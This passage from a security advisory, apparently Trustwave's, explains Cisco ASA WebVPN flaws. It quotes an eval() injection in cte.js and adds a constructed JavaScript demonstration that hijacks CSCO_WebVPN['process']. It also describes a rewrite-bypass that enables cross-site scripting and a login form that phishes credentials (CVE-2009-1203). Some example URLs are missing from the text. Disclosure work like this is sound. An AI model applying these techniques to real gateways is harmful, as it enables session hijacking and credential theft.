For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']".
The result of this call is then used in an "eval" statement.
function csco_wrap_js(str)
{
    /* Two <script> tags that point back at the gateway. The closing tags are
       split ("</scr"+"ipt>") so the literal sequence </script> never appears
       inside this inline script. */
    var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
        "/+CSCOL+/cte.js></scr"+
        "ipt><script id=CSCO_GHOST src="+
        CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
    /* CSCO_WebVPN['process'] is a globally reachable, reassignable reference,
       and whatever it returns for the 'js' pass goes straight into eval(). */
    var js_mangled=CSCO_WebVPN['process']('js',str);
    ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
    return ret;
};
To exploit this behavior, a malicious page proxied through the Web VPN (and therefore running in the ASA's DOM) can overwrite "CSCO_WebVPN['process']" with an attacker-defined function that returns an attacker-chosen string. The next time "csco_wrap_js" is called, that string is passed to "eval" and the malicious code is executed. Below is a proof of concept.
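The override described above, as an added example that is not the advisory's proof of concept and not Cisco's code. Only csco_wrap_js is reproduced from the advisory's excerpt of /+CSCOL+/cte.js; the CSCO_Gateway value, the stand-in CSCO_WebVPN object and the hijackProcess/demo helpers are constructed for this illustration.

```javascript
// Added example (not the advisory's PoC and not Cisco's code).
// csco_wrap_js is reproduced from the advisory's excerpt of /+CSCOL+/cte.js;
// everything else here is a constructed stand-in.

// ASSUMPTION: the gateway origin the ASA would substitute for CSCO_Gateway.
var CSCO_Gateway = "https://asa.example.invalid";

// Constructed stand-in for the ASA's content rewriter object. The real
// 'process' rewrites URLs inside the supplied content; returning it
// unchanged is enough to show the eval() path.
var CSCO_WebVPN = {
  process: function (type, content) {
    return content;
  }
};

// From the advisory: whatever 'process' returns for the 'js' pass is eval'd.
function csco_wrap_js(str) {
  var ret = "<script id=CSCO_GHOST src=" + CSCO_Gateway +
    "/+CSCOL+/cte.js></scr" + "ipt><script id=CSCO_GHOST src=" +
    CSCO_Gateway + "/+CSCOE+/apcf></sc" + "ript>";
  var js_mangled = CSCO_WebVPN['process']('js', str);
  ret += CSCO_WebVPN['process']('html', eval(js_mangled));
  return ret;
}

// What a page running in the ASA's DOM can do: replace the global 'process'
// so that the 'js' pass hands eval() attacker-chosen code, regardless of
// what csco_wrap_js was actually asked to wrap.
function hijackProcess(payload) {
  var original = CSCO_WebVPN['process'];
  CSCO_WebVPN['process'] = function (type, content) {
    if (type === 'js') {
      return payload;          // attacker-controlled string reaches eval()
    }
    return original(type, content);
  };
}

// Drives the sequence: a benign call, the override, then the next call.
function demo() {
  globalThis.attackerRan = false;
  var before = csco_wrap_js("1 + 1");                 // eval("1 + 1") -> 2
  hijackProcess("globalThis.attackerRan = true; 'injected'");
  var after = csco_wrap_js("1 + 1");                  // eval runs the payload instead
  return { before: before, after: after, ran: globalThis.attackerRan };
}
```

After hijackProcess, the caller's argument to csco_wrap_js no longer matters: the 'js' pass returns the payload, eval runs it, and its completion value is what gets appended to the wrapper markup. In the real attack the reassignment comes from script in a page the ASA proxies, since that script executes in the ASA's origin.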
When a webpage is requested through the ASA's Web VPN, the target's scheme and hostname are Rot13-encoded, then hex-encoded, and placed in the ASA's URL. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path:
However, if the request URL is modified to change the initial hex value from "00" to "01", the HTML document is returned without any rewriting. This allows the page's script content to run in the ASA's DOM, making Cross-Site Scripting trivial.
Authentication Credential Theft (CVE-2009-1203):
When a user accesses an FTP or CIFS destination through the Web VPN, the resulting URL is formatted in the same manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally it would be loaded in an HTML frame within the Web VPN site.
The ASA first attempts to connect to the FTP server or CIFS share with anonymous credentials. If that fails, the user is prompted for login credentials. Viewed on its own (outside the frame), the submission form gives no indication of what it is for and closely resembles the Web VPN's primary login page. If an attacker sent such a URL to a user, the user could easily assume they need to resubmit their Web VPN credentials.
The ASA would then forward those credentials to the attacker's FTP or CIFS server.